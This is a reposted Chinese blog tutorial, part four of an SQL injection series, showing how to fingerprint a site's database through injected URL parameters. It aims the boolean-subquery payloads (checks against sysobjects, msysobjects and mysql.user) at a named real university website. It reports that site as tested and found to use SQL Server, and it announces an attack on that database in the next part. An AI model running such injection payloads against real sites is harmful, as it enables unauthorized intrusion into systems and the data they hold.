MyException - 我的异常网
当前位置:我的异常网» 信息/网络安全 » SQL注入——网络安全有关问题不容忽视!(四)

SQL注入——网络安全有关问题不容忽视!(四)

www.MyException.Cn  网友分享于:2013-09-26  浏览:5次
SQL注入——网络安全问题不容忽视!(四)
 

 我们接着讲对数据库系统表的攻击 。

 

我们还是以中南大学党校管理系统为例子。

 

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41    and  1=1

 

 

如果后台是有漏洞的  后台代码如下写

 

String  id=request.getparameter("id");   
  
select  * from   table  where id = id;  

 

 

那么此时得到的id  为  41 and 1=1

 

  执行的sql语句为

 

select * from table where id=41 and 1=1

 

    这种情况id=41存在的话。那么where后面的语句总是执行为对的。

 

    首先我们攻击的第一步需要知道它是什么类型的数据库

 

  access  的msysobjects  这个在默认情况下不能访问

 

  sql server 的sysobjects 在默认情况下可以访问 

 

  mysql  的user 在默认情况下可以访问

 

   

   http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41    and  (select count(*)  from sysobjects )>0

 

 如何执行这个的效果和不加select count(*) 语句出现的页面效果一致的话,那么此系统为sqlserver。

 

 

 

后台的sql语句执行代码如下

 

 

 

 

select  * from table where id=41 and (select count(*) from  sysobjects) >0

 

   那么此时where条件成立则和id=41出现的页面是一致的。

 

  而如果

  http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from sysobjects )>0

  http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from msysobjects )>0

 

都执行不成功的话,那么则考虑是不是access 。 

 

 

如果执行下述代码成功的话,则为mysql

 

mysql> select * from admin where (select count(*) from mysql.user)>0;
+----+-------+-------+
| id | name  | pwd   |
+----+-------+-------+
|  1 | admin | admin |
+----+-------+-------+
1 row in set (0.12 sec)

 

也就是url写成

 

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and (select count(*) from mysql.user )>0

 

这种情况下返回的页面还和id=41一样的话那么。则此系统为mysql 。

 

中南大学党校管理管理系统经测试是用sqlserver做数据库的。

 

 

其实,我们根据经验可以想想 。现在国内70%以上的网站是用asp做的。而asp是微软做的。此外。access和sqlserver也都是微软做的。所以的话我们根据这个依据。有理由相信asp页面的关联数据库是access和sqlserver两个中的一个。而不是非微软制造的mysql。

 

如果是php页面那么我们就考虑mysql。而如果是jsp的话,那么考虑mysql的情况也是比较多的。

 

这一章讲了如何查看该网站所使用的数据库类型。

 

下节讲就对sqlserver数据库进行攻击。

 

 

 

 

 

 

 

 

 

文章评论

老程序员的下场
老程序员的下场
总结2014中国互联网十大段子
总结2014中国互联网十大段子
程序员最害怕的5件事 你中招了吗?
程序员最害怕的5件事 你中招了吗?
做程序猿的老婆应该注意的一些事情
做程序猿的老婆应该注意的一些事情
当下全球最炙手可热的八位少年创业者
当下全球最炙手可热的八位少年创业者
如何区分一个程序员是“老手“还是“新手“?
如何区分一个程序员是“老手“还是“新手“?
Web开发者需具备的8个好习惯
Web开发者需具备的8个好习惯
程序猿的崛起——Growth Hacker
程序猿的崛起——Growth Hacker
旅行,写作,编程
旅行,写作,编程
程序员应该关注的一些事儿
程序员应该关注的一些事儿
5款最佳正则表达式编辑调试器
5款最佳正则表达式编辑调试器
每天工作4小时的程序员
每天工作4小时的程序员
“肮脏的”IT工作排行榜
“肮脏的”IT工作排行榜
我跳槽是因为他们的显示器更大
我跳槽是因为他们的显示器更大
“懒”出效率是程序员的美德
“懒”出效率是程序员的美德
Web开发人员为什么越来越懒了?
Web开发人员为什么越来越懒了?
那些争议最大的编程观点
那些争议最大的编程观点
十大编程算法助程序员走上高手之路
十大编程算法助程序员走上高手之路
程序员必看的十大电影
程序员必看的十大电影
一个程序员的时间管理
一个程序员的时间管理
程序员的一天:一寸光阴一寸金
程序员的一天:一寸光阴一寸金
中美印日四国程序员比较
中美印日四国程序员比较
编程语言是女人
编程语言是女人
漫画:程序员的工作
漫画:程序员的工作
不懂技术不要对懂技术的人说这很容易实现
不懂技术不要对懂技术的人说这很容易实现
团队中“技术大拿”并非越多越好
团队中“技术大拿”并非越多越好
看13位CEO、创始人和高管如何提高工作效率
看13位CEO、创始人和高管如何提高工作效率
什么才是优秀的用户界面设计
什么才是优秀的用户界面设计
为什么程序员都是夜猫子
为什么程序员都是夜猫子
Java程序员必看电影
Java程序员必看电影
我是如何打败拖延症的
我是如何打败拖延症的
老美怎么看待阿里赴美上市
老美怎么看待阿里赴美上市
程序员都该阅读的书
程序员都该阅读的书
10个调试和排错的小建议
10个调试和排错的小建议
 程序员的样子
程序员的样子
初级 vs 高级开发者 哪个性价比更高?
初级 vs 高级开发者 哪个性价比更高?
鲜为人知的编程真相
鲜为人知的编程真相
程序员和编码员之间的区别
程序员和编码员之间的区别
程序员眼里IE浏览器是什么样的
程序员眼里IE浏览器是什么样的
我的丈夫是个程序员
我的丈夫是个程序员
为啥Android手机总会越用越慢?
为啥Android手机总会越用越慢?
代码女神横空出世
代码女神横空出世
聊聊HTTPS和SSL/TLS协议
聊聊HTTPS和SSL/TLS协议
10个帮程序员减压放松的网站
10个帮程序员减压放松的网站
如何成为一名黑客
如何成为一名黑客
软件开发程序错误异常ExceptionCopyright © 2009-2015 MyException 版权所有